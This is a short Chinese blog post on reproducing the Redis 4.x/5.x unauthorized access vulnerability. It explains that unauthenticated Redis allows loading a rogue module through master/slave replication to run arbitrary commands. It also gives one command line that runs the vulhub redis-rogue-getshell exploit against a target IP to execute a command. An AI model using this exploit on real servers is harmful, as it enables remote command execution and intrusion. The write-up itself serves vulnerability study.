Redis 4.x/5.x 未授权访问漏洞

基本知识

Redis非关系型数据库，
默认开放端口是6379端口，
配置文件位置为 /etc/redis/redis.conf
Redis 的数据存于内存中，所以读写速度非常快，被广泛应用于缓存方向
高性能的key-value存储系统
Redis默认是不需要账号密码
存在未授权访问漏洞

漏洞介绍

Redis未授权访问在4.x/5.0.5以前版本下，我们可以使用master/slave模式加载远程模块，通过动态链接库的方式执行任意命令。

漏洞复现

exp
https://github.com/vulhub/redis-rogue-getshell
编译
查看帮助信息
利用

┌──(root㉿kali)-[/home/roott/桌面/redis-rogue-getshell-master]
└─# python3 redis-master.py -r 192.168.1.9 -p 6379 -L 192.168.1.9 -f RedisModulesSDK/exp.so -c "id"

posted @ 2022-04-22 13:29 5rem 阅读(86) 评论(0) 编辑收藏举报

刷新页面返回顶部

登录后才能查看或发表评论，立即登录或者逛逛博客园首页

相关博文：

· nginx常见漏洞

· apache 常见漏洞复现

· Redis未授权访问漏洞

· 漏洞复现篇--Redis未授权访问漏洞

· Redis未授权访问漏洞复现

公告

昵称： 5rem
园龄： 3年
粉丝： 5
关注： 5

+加关注

2025年3月

日

一

二

三

四

五

六

随笔档案

文章档案

2023年7月(1)

Loading

5rem

Redis 4.x/5.x 未授权访问漏洞

基本知识

漏洞介绍

漏洞复现

公告

搜索

常用链接

我的标签

随笔档案

文章档案

阅读排行榜